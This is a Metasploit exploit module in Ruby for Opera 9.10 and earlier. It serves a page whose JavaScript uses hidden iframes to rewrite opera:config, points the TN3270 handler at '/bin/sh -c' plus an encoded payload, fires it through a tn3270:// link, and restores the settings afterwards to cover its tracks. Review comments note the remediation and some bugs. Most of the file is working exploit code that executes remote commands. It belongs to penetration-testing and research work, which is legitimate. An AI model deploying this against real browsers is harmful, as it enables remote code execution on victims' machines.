GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/opera_configoverwrite.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# Opera 9 Configuration Overwrite -- browser exploit served over HTTP.
#
# Affected: Opera <= 9.10 (see :ua_maxver and 'Description' below). The page
# this module serves uses nested iframes to run script in the context of
# opera:config, rewrites the 'TN3270 App' and 'Run TN3270 In Terminal'
# preferences, and triggers the handler through a tn3270:// link. Both
# preferences are restored via setTimeout after 1000 ms, so the change is
# transient (presumably leaving little trace in the saved configuration --
# confirm before relying on that for forensics). Remediation is upgrading
# Opera past 9.10.
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # BrowserAutopwn metadata: the client profile for which autopwn will
  # hand out this module.
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :ua_name => HttpClients::OPERA,
    :ua_maxver => "9.10",
    # NOTE(review): WINDOWS is listed here, but the Windows target in
    # 'Targets' below is commented out and 'Platform' is unix-only, so
    # autopwn may select this module for a Windows client that the enabled
    # target cannot serve -- confirm whether WINDOWS should stay.
    :os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],
    :javascript => true,
    :rank => ExcellentRanking, # reliable cmd exec, cleans up after itself
    :vuln_test => nil,
  })

  # Module metadata: name, references, payload constraints and targets.
  #
  # @param info [Hash] base module info, merged via +update_info+
  def initialize(info = {})
    super(update_info(info,{
      'Name' => 'Opera 9 Configuration Overwrite',
      'Description' => %q{
Opera web browser in versions <= 9.10 allows unrestricted script
access to its configuration page, opera:config, allowing an
attacker to change settings and potentially execute arbitrary
code.
},
      'License' => BSD_LICENSE,
      'Author' =>
        [
          'egypt', # stolen from mpack
        ],
      'References' =>
        [
          [ 'OSVDB', '66472'],
        ],
      # Payload constraints: a command payload (ARCH_CMD target below) of at
      # most 2048 bytes, no NOP sled.
      'Payload' =>
        {
          'EXITFUNC' => 'process',
          'Space' => 2048,
          'DisableNops' => true,
          # NOTE(review): presumably excluded because the command is appended
          # unquoted after '/bin/sh -c ' in generate_evil_js -- confirm.
          'BadChars' => " ",
        },
      'Platform' => %w{ unix },
      'Targets' =>
        [
          #[ 'Opera < 9.10 Windows',
          # {
          # 'Platform' => 'win',
          # 'Arch' => ARCH_X86,
          # }
          #],
          [ 'Opera < 9.10 Unix Cmd',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
            }
          ],
        ],
      # Not sure when this was disclosed but it's been known since at
      # least March 5, 2007, since that's the release date on the version
      # of mpack I stole this from.
      'DisclosureDate' => '2007-03-05',
      'DefaultTarget' => 0
    }))
  end

  # HTTP handler: serves the exploit page for the module's own resource
  # URI and answers every other path with 404.
  #
  # @param cli client connection handed in by the HttpServer mixin
  # @param request the incoming HTTP request (+request.uri+ is read)
  # @return [void]
  def on_request_uri(cli, request)
    print_status("Got request #{request.uri}")

    case request.uri
    when get_resource
      print_status("Sending #{self.name}")
      # The page body is just the generated script (see generate_evil_js).
      # NOTE(review): generate_evil_js returns nil on its no-payload path;
      # +<<+ would then raise TypeError here -- confirm the caller should
      # bail out instead.
      content = "<body><script>"
      content << generate_evil_js(cli, request)
      content << "</script></body>"
      headers = { 'Content-Type' => 'text/html' }
    else
      # Unknown path: 404 and stop, so +content+/+headers+ are always set
      # when send_response_html below is reached.
      print_status("404ing request for #{request.uri}")
      send_not_found(cli)
      return
    end
    send_response_html(cli, content, headers)

    print_status("Done with request #{request.uri}")
  end

  # Builds the JavaScript for the exploit page.
  #
  # @param cli client connection, used to regenerate the payload and to
  #   send a 404 when no payload is available
  # @param request the HTTP request (not used here)
  # @return [String, nil] the script text, or nil when no payload could be
  #   generated (a 404 has already been sent in that case, assuming
  #   send_not_found returns a truthy value)
  def generate_evil_js(cli, request)
    # There are a bunch of levels of quotes here, so the easiest way to
    # make everything line up is to hex escape the command to run
    p = regenerate_payload(cli).encoded
    # NOTE(review): this guard runs after +.encoded+ has already been
    # called, so a nil from regenerate_payload raises NoMethodError on the
    # line above before the guard is reached; and on the guard path the
    # method returns nil, which on_request_uri appends with +<<+ after the
    # 404 has gone out. Checking regenerate_payload's result before calling
    # .encoded, and having the caller handle nil, would close both gaps.
    send_not_found(cli) && return if not p

    # %XX-encoded so the command survives the nested quoting below; the
    # script calls unescape() on it before use.
    shellcode = Rex::Text.to_hex(p, "%")
    # The heredoc assignment is the last expression, so +js+ is the return
    # value. It is a plain <<ENDJS heredoc: leading whitespace on the
    # content lines would become part of the script, hence no indentation.
    js = <<ENDJS
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.body.appendChild(blank_iframe);
blank_iframe_window.eval(
"config_iframe = document.createElement('iframe');" +
"config_iframe.setAttribute('id', 'config_iframe_window');" +
"config_iframe.src = 'opera:config';" +
"document.body.appendChild(config_iframe);" +
"cache_iframe = document.createElement('iframe');" +
"cache_iframe.src = 'opera:cache';" +
"cache_iframe.onload = function ()" +
"{" +
" config_iframe_window.eval" +
" (\\"" +
" old_handler = opera.getPreference('Network','TN3270 App');" +
" old_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +
" shellcode = '#{shellcode}';" +
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
" opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +
" app_link = document.createElement('a');" +
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
" app_link.click();" +
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
" setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +
" \\");" +
"};" +
"document.body.appendChild(cache_iframe);" +
"");
ENDJS

  end
end